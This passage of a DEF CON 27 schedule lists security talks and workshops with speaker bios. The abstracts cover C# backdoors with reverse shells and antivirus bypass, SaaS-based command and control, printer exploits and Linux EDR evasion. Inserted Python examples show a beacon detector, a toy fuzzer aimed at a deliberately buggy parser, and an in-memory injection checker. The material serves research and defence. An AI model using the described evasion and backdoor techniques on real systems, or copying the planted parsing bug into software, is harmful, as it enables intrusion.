The trend is real, but there is a big challenge: most of the systems in cars and medical devices run on ARM, and protection at the hypervisor level is still limited. So, is it possible to have a framework that runs at the hypervisor level, monitors at the OS level and, most importantly, is capable of identifying and killing threats coming into the monitored devices?

During this talk we will walk you through the steps needed to set up a framework running on a Xilinx ZCU102 board that can monitor ARM-based devices and kill the malicious threats it identifies. We will also discuss the challenges of syscall monitoring, single-stepping limitations, techniques to stay stealthy, techniques to detect and kill the traditional malware seen in the enterprise such as ransomware and heap exploits, capabilities against VM escape attacks, and the feasibility of detecting Spectre-like exploits.

Ali Islam
Ali Islam Khan is the Chief Executive Officer (CEO) and Co-Founder of Numen Inc. He is also an avid C programmer and has developed the core set of Numen’s Virtual Machine Introspection (VMI) capabilities. Before quitting his job to work full time on Numen, Ali was Director R&D at FireEye where he was leading the R&D efforts for FireEye’s flagship email and network products. He is the founding member of FireEye Labs where he invented & developed some of the key detection technologies used in FireEye products today. Ali has multiple patents to his name and has over 13 years’ experience in a wide range of cyber security disciplines, including cryptography, malware analysis, cyber-espionage and product development. He has successfully created and led global teams from scratch. Ali has spoken at conferences such as RSA and worked with various government agencies such as DHS, KISA on intelligence sharing efforts to counter nation-state level threats.

Khan holds an MBA from UC Berkeley and a Master’s degree in network security from Monash University, Australia. He is an AUSAID scholar and the recipient of the prestigious Golden Key Award.

Twitter: @Ali_Islam_Khan
LinkedIn: https://www.linkedin.com/in/aliislam/

Dan Regalado (DanuX)
Daniel Regalado aka DanuX is the CTO and Co-Founder of Numen Inc. He is a Mexican security researcher with more than 17 years in the scene. He has worked reversing malware and exploits at the Symantec Security Response Team and FireEye Labs, and lately focused on IoT threats at Zingbox. He is credited with the discovery of most of the ATM malware worldwide. He is the co-author of the book Gray Hat Hacking and likes to present his discoveries at major security conferences such as RECon, RSA, the DEF CON IoT and Car Hacking villages, and BSides.

Twitter: @danuxx
LinkedIn: https://www.linkedin.com/in/daniel-regalado-200aa414/


Return to Index    -    Add to    -    ics Calendar file

 

BTVT - Flamingo - 3rd Floor- Savoy Room - Saturday - 16:30-16:59


When A Plan Comes Together: Building A SOC A-Team

Saturday 16:30, Savoy Ballroom, Flamingo (Blue Team Village) (30M)

@markaorlando started his security career in 2001 as a Security Analyst, and since then has been both fighting for blue team resources and trying to automate them out of a job. He has built, assessed, and managed security teams at the Pentagon, the White House, the Department of Energy, global Managed Security Service Providers, and numerous financial sector and Fortune 500 clients. Short on patience and attention, Mark is constantly working on new projects to improve defensive security through automation and other short cut-y things so defenders can be more agile and creative. While Director of Operations at Foreground Security, he designed and launched a Managed Detection and Response (MDR) service offering and helped to invent an automated cyber threat hunting technology, both of which were later acquired. He enjoys teaching and learning from others but spends far more time doing the latter.

The security industry is facing a severe talent shortage, but the threats are growing in number and sophistication. Finding talent, honing it to meet your specific mission, and retaining it have become immense challenges for modern operations teams. In this talk, we’ll explore these challenges and discuss creative ways to find, train, and equip a security operations “A-Team”.


Return to Index    -    Add to    -    ics Calendar file

 

DC - Paris - Track 3 - Saturday - 12:00-12:45


Why You Should Fear Your “mundane” Office Equipment

Saturday at 12:00 in Track 3
45 minutes | Demo, Tool, Exploit

Daniel Romero Managing Security Consultant, NCC Group

Mario Rivas Senior Security Consultant, NCC Group

The security of common enterprise infrastructure devices such as desktops and laptops has advanced over the years through incremental improvements in operating system and endpoint security. However, security controls for network devices such as enterprise printers are often ignored and thus present a greater potential for exploitation and compromise by threat actors seeking to gain a persistent foothold on target organisations.

In order to assess the current state of mainstream enterprise printer product security and to challenge common assumptions made about the security of these devices, which sit on key parts of enterprise networks and process sensitive data, we set out on a vulnerability and exploitation research project of six known vendors. We were able to find remote vulnerabilities in all printers tested through various attack vectors, revealing a large number of 0-day vulnerabilities in the process.

In this talk we walk through the entire research engagement, from initial phases such as threat modelling to understand printer attack surfaces, to the development of attack methodologies and fuzzing tools used to target printer-specific protocols and functions. Besides highlighting the important vulnerabilities found and their respective CVEs, we present proof-of-concept exploits showing how it is possible to gain full control of printers and all of the data they manage. This shows how enterprise printers can be used as a method of persistence on a network, perhaps to exfiltrate sensitive data or support C2 persistence on red team engagements.

We also address a number of challenges that researchers can face when performing vulnerability research on devices such as printers and how we used different techniques to overcome these challenges, working with limited to no debugging and triage capabilities. We also present mitigations that printer manufacturers can implement in order to reduce printer attack surfaces and render exploitation more difficult.

Daniel Romero
Daniel is currently a security consultant and researcher at NCC Group. During his career he has worked in interesting security projects, always trying to “break” as much as possible. In the last years Daniel has mostly been focused on embedded devices / IoT and all what surrounds it such as hardware, code review, reverse engineering, fuzzing or exploiting.

Twitter: @daniel_rome

Mario Rivas
Mario is a penetration tester and security consultant at NCC Group in Madrid. His interests revolve around all areas of computer security, always trying to learn new things, and specially enjoying writing tools during the process to make his life a bit easier.

Twitter: @Grifo


Return to Index    -    Add to    -    ics Calendar file

 

DL - Planet Hollywood - Sunset 1 - Saturday - 10:00 - 11:50


WiFi Kraken – Scalable Wireless Monitoring

Saturday from 10:00 – 11:50 in Sunset 1 at Planet Hollywood
Audience: Offense, Defense, Hardware

Mike Spicer

This tool is the culmination of lessons learned during the last 3 years of wireless monitoring at DEF CON using tools like the #WiFiCactus. This demo will show you the software and hardware needed to build a robust wireless monitoring sensor network that is capable of capturing everything up to 802.11ac, including Bluetooth. The demo will include a distributed capture network that takes captured data from multiple nodes and sends it back to a single capture server. The project will show you how to use advanced features of Kismet Wireless to increase the amount of data you capture. Wireless threats and attacker tactics will be discussed and identified as they happen in the environment. Data analytic techniques will be demonstrated and discussed using tools like Wireshark, NetworkMiner and PCAPinator.

http://palshack.org/def-con-27-demolab/

Mike Spicer
d4rkm4tter is a mad scientist hacker who likes to meddle with hardware and software. He is particularly obsessed with wireless. He has a degree in computer science from Southern Utah University which he has put to use building and breaking a wide array of systems. These include web application pentesting, wireless monitoring and tracking as well as good old fashioned reverse engineering. He is the creator of the #WiFiCactus and has been seen presenting Demolabs at DEF CON and DEF CON China Beta. He is a Kismet cultist and active in the wireless and wardriving communities.


Return to Index    -    Add to    -    ics Calendar file

 

Workshops - ( Sold Out ) - Flamingo - Lower Level - Lake Mead II - Saturday - 10:00-13:59


Writing custom backdoor payloads using C#

Saturday, 1000-1400 in Flamingo, Lake Mead II

Mauricio Velazco Threat Management Team Lead

Olindo Verrillo Hacker

This workshop aims to give attendees hands-on experience writing custom backdoor payloads in C# for the most common command and control frameworks, including Metasploit, PowerShell Empire and Cobalt Strike. The workshop consists of 7 lab exercises; each exercise covers a different technique that leverages C# and .NET capabilities to obtain a reverse shell on a victim Windows host. The covered techniques include raw shellcode injection, process injection, process hollowing, runtime compilation, parent PID spoofing, antivirus bypassing, etc. At the end of this workshop attendees will have a clear understanding of these techniques from both an attack and a defense perspective.

Skill Level Intermediate

Prerequisites: Basic to intermediate programming/scripting skills. Prior experience with C# helps but is not required.

Materials: Laptop with virtualization software, a Windows virtual machine and a Kali Linux virtual machine.

Max students: 40

Registration: https://www.eventbrite.com/e/writing-custom-backdoor-payloads-using-c-lake-mead-ii-tickets-63439591526
(Opens 8-Jul-19)

Mauricio Velazco
Mauricio Velazco (@mvelazco) is a Peruvian, Infosec geek who started his career as a penetration tester and jumped to the blue team 7 years ago. He currently leads the Threat Management team at a financial services organization in New York where he focuses on threat detection/hunting and adversary simulation. Mauricio has presented and hosted workshops at conferences like Defcon, Derbycon and BSides. He also holds certifications like OSCP and OSCE.

Olindo Verrillo
Olindo Verrillo is a Senior Security Engineer who straddles the line between blue and red. He currently focuses most of his attention on purple teaming and detection engineering. Olindo has worked as Senior consultant, performing both offensive and defensive engagements for numerous Fortune 500 companies.


Return to Index    -    Add to    -    ics Calendar file

 

PHVW - Bally's - Indigo Tower - 26th Floor - Saturday - 13:40-15:40


Writing Wireshark Plugins for Security Analysis

Nishant Sharma, R&D Manager, Pentester Academy
Jeswin Mathai, Security Researcher, Pentester Academy

Network traffic always proves to be a gold mine when mined with proper tools. There are various open source and paid tools to analyze the traffic but most of them either have predefined functionality or scalability issues or one of a dozen other problems. And, in some cases when we are dealing with non-standard protocols, the analysis becomes more difficult. But, what if we can extend our favourite traffic analysis tool Wireshark to accommodate our requirements? As most people know, Wireshark supports custom plugins created in C and Lua which can be used to analyze or dissect the packets. In this workshop, we will learn the basics of Wireshark plugins and move on to create different types of plugins to perform dissection of non-standard protocol, provide macro statistics, detect attacks etc. We will use examples of older and newer protocols (including non-standard ones) to understand the plugin workflow and development.

Nishant Sharma (Twitter: @wifisecguy) is an R&D Manager at Pentester Academy and Attack Defense. He is also the Architect at Hacker Arsenal where he leads the development of multiple gadgets for WiFi pentesting such as WiMonitor, WiNX and WiMini. He also handles technical content creation and moderation for Pentester Academy TV. He has 7+ years of experience in the information security field, including 5+ years in WiFi security research and development. He has presented/published his work at Blackhat USA/Asia, DEF CON China, Wireless Village, IoT Village and Demo Labs (DEF CON USA). Prior to joining Pentester Academy, he worked as a firmware developer at Mojo Networks where he contributed to developing new features for enterprise-grade WiFi APs and maintaining a state-of-the-art WiFi Intrusion Prevention System (WIPS). He has a Master's degree in Information Security from IIIT Delhi. He has also published peer-reviewed academic research on HMAC security. His areas of interest include WiFi and IoT security, AD security, Forensics and Cryptography.

Jeswin Mathai (Twitter: @jeswinmathai) is a Researcher at Pentester Academy and Attack Defense. He has presented/published his work at DEF CON China, Blackhat Arsenal and Demo Labs (DEF CON). He has a Bachelor's degree from IIIT Bhubaneswar. He was the team lead at InfoSec Society IIIT Bhubaneswar in association with CDAC and ISEA, which performed security auditing of government portals and conducted awareness workshops for government institutions. He was also part of team Pied Piper, which won Smart India Hackathon 2017, a national level competition organized by GoI. His areas of interest include Malware Analysis and Reverse Engineering, Cryptography, WiFi security and Web Application Security.


Return to Index    -    Add to    -    ics Calendar file

 

CLV - Flamingo 3rd Floor - Reno I Room - Saturday - 15:05-15:50


Speaker: Erick Galinkin

Twitter: @erickgalinkin

Abstract: What happens when attackers start taking advantage of whitelisted APIs as a form of obfuscated command and control? Companies both large and small are moving workloads to the cloud and are very concerned with how to secure their resources which actually live in AWS, GCP, and Azure. However, they don't address how enabling this access changes their internal attack surface and weakens their defenses.

In this talk, we demonstrate that attackers no longer have any reason to rely on conventional C2 infrastructure, since they can outsource their costs and infrastructure management to the likes of Slack, GitHub, Pastebin, Dropbox, Google and social media sites. With these techniques, URL blacklisting becomes obsolete, IDS becomes less effective, and attackers no longer have to waste their time writing domain generation algorithms.

Specifically, I will demo a proof-of-concept malware which uses multiple SaaS services, social networks, and more conventional "cloud infrastructure" (S3) that would be extremely difficult to mitigate generically with today's IPS solutions, and we discuss how the same techniques can be used by red teams and attackers to quietly maintain persistence and exfiltrate data.
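
The abstract argues that once C2 rides on allow-listed SaaS hosts, matching on hostname or URL tells the defender nothing. The following is an added example, not code from the talk or from Netskope: a small beacon detector that ignores hostnames entirely and looks at request timing per (client, service) pair, run over a constructed proxy log. The log format (timestamp, client IP, host, path, bytes out), the thresholds and the gist path are all assumptions made for the example.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed proxy log for the example (not real traffic). Every host here is one
# that an allow-list would normally permit, so hostname matching alone sees nothing.
# Fields: timestamp src_ip host path bytes_out
SAMPLE_LOG = """\
2019-08-10T09:00:00 10.1.1.5 api.github.com /gists/abc123 512
2019-08-10T09:00:00 10.1.1.9 slack.com /api/conversations.history 3018
2019-08-10T09:00:07 10.1.1.9 slack.com /api/chat.postMessage 640
2019-08-10T09:00:30 10.1.1.5 pastebin.com /raw/Kq2xTz 228
2019-08-10T09:01:01 10.1.1.5 api.github.com /gists/abc123 512
2019-08-10T09:02:00 10.1.1.5 api.github.com /gists/abc123 514
2019-08-10T09:03:02 10.1.1.5 api.github.com /gists/abc123 512
2019-08-10T09:03:40 10.1.1.9 slack.com /api/files.upload 40960
2019-08-10T09:03:59 10.1.1.5 api.github.com /gists/abc123 513
2019-08-10T09:05:01 10.1.1.5 api.github.com /gists/abc123 512
2019-08-10T09:06:00 10.1.1.5 api.github.com /gists/abc123 512
2019-08-10T09:07:01 10.1.1.5 api.github.com /gists/abc123 515
2019-08-10T09:12:02 10.1.1.9 slack.com /api/conversations.history 2990
2019-08-10T09:12:05 10.1.1.9 slack.com /api/chat.postMessage 611
2019-08-10T09:30:11 10.1.1.9 slack.com /api/conversations.history 3102
"""


def parse_log(text):
    """Group requests by (client, host); keep timestamp, path and bytes_out."""
    by_pair = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, host, path, size = line.split()
        by_pair[(src, host)].append((datetime.fromisoformat(ts), path, int(size)))
    return by_pair


def beacon_stats(times):
    """Mean gap between consecutive requests and its coefficient of variation.
    A low CV means the client polls on a fixed schedule, jitter or not."""
    times = sorted(times)
    if len(times) < 2:
        return 0.0, float("inf")
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    m = mean(gaps)
    cv = pstdev(gaps) / m if m > 0 else float("inf")
    return m, cv


def find_beacons(text, min_requests=6, max_cv=0.2, max_distinct_paths=2):
    """Flag (client, host) pairs that poll with low jitter and hit few URLs.
    Hostnames are deliberately never consulted: all of them are allowed."""
    findings = []
    for (src, host), reqs in parse_log(text).items():
        if len(reqs) < min_requests:
            continue
        m, cv = beacon_stats([r[0] for r in reqs])
        paths = {r[1] for r in reqs}
        if cv <= max_cv and len(paths) <= max_distinct_paths:
            findings.append({"src": src, "host": host, "requests": len(reqs),
                             "interval_s": round(m, 1), "jitter_cv": round(cv, 3),
                             "paths": sorted(paths)})
    return findings


if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_LOG):
        print(hit)
```

On the constructed log only 10.1.1.5 polling one GitHub gist roughly every 60 seconds is flagged; the Slack user makes the same number of requests but at irregular intervals and to several endpoints, so it passes. An implant that randomises its sleep heavily will push the CV above the threshold, so in practice this is paired with a baseline of bytes out per pair and with the ratio of requests to distinct content fetched, rather than used alone.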

About Erick: Erick is a security researcher at Netskope focused on malicious SaaS usage and attacks against Microsoft Azure. He was previously at Cisco's Talos group where he focused on hunting exploit kits. As part of his academic research at Johns Hopkins University, he conducts research on neural networks, verifiable computing, and computational complexity.


Return to Index    -    Add to    -    ics Calendar file

 

DC - Paris - Track 1 - Saturday - 11:00-11:45


Your Car is My Car

Saturday at 11:00 in Track 1
45 minutes | Demo, Tool, Exploit

Jmaxxz

For many of us, our cars are one of the largest purchases we will ever make. In an always connected world it is natural that we would want the convenience of being able to remotely monitor our vehicles: to do everything from remind ourselves exactly where we parked, verify we locked our vehicle, or even remote start it so it will be warmed up (or cooled down) when we get in. There are a variety of vendors offering aftermarket alarm systems that provide these conveniences and offer peace of mind. But how much can we trust that the vendors of these systems are protecting access to our cars in the digital domain? In this talk, Jmaxxz will tell the story of what he found when he looked into one such system.

Jmaxxz
Jmaxxz works as a software engineer, but is a hacker by passion. He is best known for his work on the August Smart Lock (DEF CON 24 “Backdooring the Frontdoor”). In recent years IoT devices have been the focus of his work. He participated in the IoT village zero day track at DEF CON 24 and DEF CON 25. After enduring several polar vortexes, he decided it was probably time to investigate an IoT remote car starter.

twitter: @jmaxxz Website: jmaxxz.com


Return to Index    -    Add to    -    ics Calendar file

 

DC - Paris - Track 3 - Saturday - 14:00-14:45


Zero bugs found? Hold my Beer AFL! How To Improve Coverage-Guided Fuzzing and Find New 0days in Tough Targets

Saturday at 14:00 in Track 3
45 minutes | Demo, Tool, Exploit

Maksim Shudrak Security Researcher

Fuzzing remains the most effective technique for bug hunting in memory-unsafe programs. Last year, hundreds of security papers and talks on fuzzing were published, and dozens of them focused on adapting or improving American Fuzzy Lop in some way. Attractive for its simplicity and efficiency, AFL is the number one choice for the vast majority of security researchers. This popularity means that hunting for bugs with AFL or a similar tool is becoming less and less fruitful, since many projects are already covered by other researchers. It is especially hard when we talk about a project participating in Google's OSS-Fuzz program, which uses AFL to generate half a trillion test cases per day.

In practice, this means that we can no longer blindly rely on AFL and should search for better fuzzing techniques. In order to overcome this challenge, we need to understand how AFL and similar fuzzers work and be able to use their weaknesses to find new 0days. This talk discusses these weaknesses on real examples, explains how we can do fuzzing better, and releases a new open-source fuzzer called Manul.

Manul is a highly scalable coverage-guided parallel fuzzer with the ability to search for bugs in open source and black box binaries on Windows and Linux. Manul was able to find 10 0-days in 4 widely-used projects that had been extensively tested by AFL. These vulnerabilities were not found by chance, but by analyzing and addressing issues that exist in AFL. The authors will show several of the most critical vulnerabilities and explain why AFL overlooked them.

This talk will be of interest to experienced hackers who want to improve their bug hunting capabilities, as well as to new researchers who are making their first steps on the thorny trail of bug hunting.

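To make the "understand how AFL and similar fuzzers work" point concrete, here is an added example (not code from the talk, nor from Manul or AFL): a toy coverage-guided fuzzer in Python. It traces which line-to-line edges a target exercises, keeps only inputs that reach new edges, and mutates the most recently promoted input. The target is a constructed parser whose byte-by-byte magic check is exactly the kind of structure coverage feedback exploits, and whose trusted length field is the bug. Everything here (the record format, the mutation mix, the corpus selection bias) is an assumption chosen for the example.

```python
import random
import sys


def parse_record(data: bytes) -> str:
    """Constructed target (not from the talk): records start with the 4-byte magic
    'MANU', then a 1-byte declared payload length, then the payload. Each magic
    byte is checked on its own line so that coverage feedback can reward partial
    progress, which is what lets AFL-style fuzzers get past such checks."""
    if len(data) < 6:
        return "short"
    if data[0] != 0x4D:          # 'M'
        return "bad-magic"
    if data[1] != 0x41:          # 'A'
        return "bad-magic"
    if data[2] != 0x4E:          # 'N'
        return "bad-magic"
    if data[3] != 0x55:          # 'U'
        return "bad-magic"
    length = data[4]
    if length == 0:
        return "empty"
    # Bug: the declared length is trusted, so reading the last payload byte
    # raises IndexError when the record is shorter than it claims to be.
    last = data[5 + length - 1]
    return "ok:%02x" % last


def run_with_coverage(target, data):
    """Run target(data) under sys.settrace and collect (prev_line, line) edges,
    a cheap stand-in for AFL's edge-coverage bitmap. Returns (edges, exception)."""
    edges = set()
    prev = [0]

    def tracer(frame, event, arg):
        if event == "line":
            edges.add((prev[0], frame.f_lineno))
            prev[0] = frame.f_lineno
        return tracer

    sys.settrace(tracer)
    try:
        target(data)
        crashed = None
    except Exception as exc:      # any uncaught exception counts as a crash
        crashed = exc
    finally:
        sys.settrace(None)
    return edges, crashed


def mutate(data: bytes, rng: random.Random) -> bytes:
    """Havoc-style single mutation: byte replace, bit flip, or an 'interesting' value."""
    buf = bytearray(data)
    pos = rng.randrange(len(buf))
    roll = rng.random()
    if roll < 0.7:
        buf[pos] = rng.randrange(256)
    elif roll < 0.85:
        buf[pos] ^= 1 << rng.randrange(8)
    else:
        buf[pos] = rng.choice((0x00, 0x01, 0x7F, 0x80, 0xFF))
    return bytes(buf)


def fuzz(target, seed: bytes, budget: int, rng: random.Random) -> dict:
    """Coverage-guided loop: promote only children that reach new edges, and
    prefer mutating the newest corpus entry, which is usually the deepest."""
    corpus = [seed]
    seen, _ = run_with_coverage(target, seed)
    for i in range(1, budget + 1):
        parent = corpus[-1] if rng.random() < 0.75 else rng.choice(corpus)
        child = mutate(parent, rng)
        edges, crash = run_with_coverage(target, child)
        if crash is not None:
            return {"crash": child, "exception": repr(crash),
                    "iterations": i, "corpus": len(corpus)}
        if not edges <= seen:      # new coverage: keep this input
            seen |= edges
            corpus.append(child)
    return {"crash": None, "exception": None, "iterations": budget, "corpus": len(corpus)}


def fuzz_demo(seed_value: int = 1, budget: int = 100_000) -> dict:
    """Deterministic run against the constructed target from an all-zero seed."""
    return fuzz(parse_record, b"\x00" * 8, budget, random.Random(seed_value))


if __name__ == "__main__":
    print(fuzz_demo())
```

Without the coverage feedback (that is, if every child were kept or none were), the four magic bytes would have to be guessed together, which is hopeless at 256^4 odds; with it, each byte is a separate 1-in-a-few-thousand event and the crash appears within a few tens of thousands of executions. The same mechanism explains the weakness the talk points at: once a comparison does not produce a distinguishable edge (a checksum, a multi-byte compare in one instruction, a state kept outside the traced code), the feedback goes flat and a fuzzer that relies on it stalls there.
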
Maksim Shudrak
Maksim is a security researcher and vulnerability hunter in open-source and black box applications. In the past he worked on the dynamic binary instrumentation framework DynamoRIO, developed a highly abstract Windows OS emulator for malware analysis at IBM Research, and wrote a sophisticated fuzzer to search for vulnerabilities in machine code. The latter was so exciting that he defended a PhD on the topic. Today he works on the red team side at a large cloud-based software company.

Maksim has spoken at various security conferences around the world such as DEF CON, Positive Hack Days, Virus Bulletin and BSides SF.

Twitter: @Mshudrak
LinkedIn: https://www.linkedin.com/in/mshudrak


Return to Index    -    Add to    -    ics Calendar file

 

DC - Paris - Track 4 - Saturday - 12:00-12:45


Zombie Ant Farm: Practical Tips for Playing Hide and Seek with Linux EDRs

Saturday at 12:00 in Track 4
45 minutes | Demo, Tool

Dimitry Snezhkov Sr. Security Consultant, X-Force Red

EDR solutions have landed in Linux. With the ever increasing footprint of Linux machines deployed in data centers, offensive operators have to answer the call.

In the first part of the talk we will share practical tips and techniques hackers can use to slide under the EDR radar, and expand post-exploitation capabilities.

We will see how approved executables can be used as decoys to execute foreign functionality. We will walk through the process of using well-known capabilities of the dynamic loader. We will take lessons from user-land rootkits in our evasion choices.

Part two will focus on weaponizing the capabilities. We will show how to create custom preloaders, and use mimicry to hide modular malware in memory. We will create a "Preloader-as-a-Service" capability of sorts by abstracting storage of modular malware from its executing cradles. This PaaS is free to you though!
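
The preloader and in-memory loading tricks above all leave traces in the process's address space and environment, which is where a Linux defender looks first. The following is an added example, not code from the talk or from the X-Force Red toolkit: a checker that parses /proc/<pid>/maps for executable mappings backed by memfd or deleted files, anonymous rwx regions, and code loaded from outside the usual library directories, plus a look at the two classic preload channels (LD_PRELOAD / LD_AUDIT and /etc/ld.so.preload). The maps excerpt is constructed, and the list of trusted directories is an assumption to tune per host.

```python
# Constructed /proc/<pid>/maps excerpt (not taken from a real host). Per-line format:
# address perms offset dev inode [pathname]
SAMPLE_MAPS = """\
55d0c0000000-55d0c0020000 r-xp 00000000 fd:01 1234       /usr/bin/sleep
7f1a00000000-7f1a00200000 r-xp 00000000 fd:01 5678       /usr/lib/x86_64-linux-gnu/libc.so.6
7f1a00300000-7f1a00310000 r-xp 00000000 00:05 90         /memfd:payload (deleted)
7f1a00400000-7f1a00410000 r-xp 00000000 fd:01 777        /tmp/libhook.so
7f1a00500000-7f1a00520000 rwxp 00000000 00:00 0
7ffd00000000-7ffd00021000 rw-p 00000000 00:00 0          [stack]
7ffd00030000-7ffd00032000 r-xp 00000000 00:00 0          [vdso]
"""

# Assumed set of directories from which executable mappings are expected.
TRUSTED_PREFIXES = ("/usr/lib", "/usr/lib64", "/usr/libexec", "/usr/local/lib",
                    "/usr/bin", "/usr/sbin", "/lib", "/lib64", "/bin", "/sbin")


def parse_maps(text):
    """Split maps lines into dicts; the pathname column is optional."""
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        parts = line.split(None, 5)
        addr, perms, _offset, _dev, inode = parts[:5]
        path = parts[5].strip() if len(parts) == 6 else ""
        entries.append({"addr": addr, "perms": perms, "inode": int(inode), "path": path})
    return entries


def suspicious_mappings(text):
    """Return (addr, reason, path) for executable mappings that a preloader or an
    in-memory loader typically leaves behind. Non-executable regions are ignored."""
    findings = []
    for e in parse_maps(text):
        if "x" not in e["perms"]:
            continue
        p = e["path"]
        if p.startswith("/memfd:"):
            findings.append((e["addr"], "executable memfd mapping", p))
        elif p.endswith("(deleted)"):
            findings.append((e["addr"], "executable mapping of deleted file", p))
        elif p == "" and "w" in e["perms"]:
            findings.append((e["addr"], "anonymous rwx mapping", p))
        elif p.startswith("/") and not p.startswith(TRUSTED_PREFIXES):
            findings.append((e["addr"], "executable file outside trusted directories", p))
    return findings


def preload_indicators(environ, ld_so_preload=""):
    """Check loader-driven injection channels: LD_PRELOAD / LD_AUDIT in the
    process environment and entries in /etc/ld.so.preload (comments stripped)."""
    out = []
    for var in ("LD_PRELOAD", "LD_AUDIT"):
        if environ.get(var):
            out.append((var, environ[var]))
    for line in ld_so_preload.splitlines():
        line = line.split("#", 1)[0].strip()
        out.extend(("/etc/ld.so.preload", lib) for lib in line.split())
    return out


def scan_process(pid):
    """Live variant for a Linux host: read maps and environ of one pid from /proc."""
    with open(f"/proc/{pid}/maps") as f:
        maps = f.read()
    with open(f"/proc/{pid}/environ", "rb") as f:
        raw = [kv.split(b"=", 1) for kv in f.read().split(b"\0") if b"=" in kv]
    environ = {k.decode(errors="replace"): v.decode(errors="replace") for k, v in raw}
    try:
        with open("/etc/ld.so.preload") as f:
            preload = f.read()
    except FileNotFoundError:
        preload = ""
    return suspicious_mappings(maps), preload_indicators(environ, preload)


if __name__ == "__main__":
    for finding in suspicious_mappings(SAMPLE_MAPS):
        print(finding)
```

Two caveats a practitioner will hit immediately: a library replaced by a package upgrade while a process is still running shows up as "(deleted)" too, so that signal needs correlating with package manager activity, and JIT runtimes (browsers, the JVM, some interpreters) legitimately hold anonymous rwx regions. The memfd and preload indicators are the high-confidence ones; the talk's point is that an operator who knows these checks will hide in the grey cases, which is why the decoy-executable approach it describes is worth studying from the defender's side as well.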

We fully believe the ability to retool in the field matters, so we have packaged the techniques into reusable code patterns in a toolkit you will be able to use (or base your own code on) after it is released.

This talk is for hackers, offensive operators, malware analysts and system defenders. We sincerely hope defensive hackers can attend and also have fun.

Dimitry Snezhkov
Dimitry Snezhkov is a Sr. Security Consultant for X-Force Red. In this role he hacks code, tools, networks, apps and sometimes subverts human behavior too. Dimitry has spoken at DEF CON, THOTCON, DerbyCon, CircleCityCon, NorthSec, and presented tools at BlackHat Arsenal.

Twitter: @Op_Nomad


Return to Index    -    Add to    -    ics Calendar file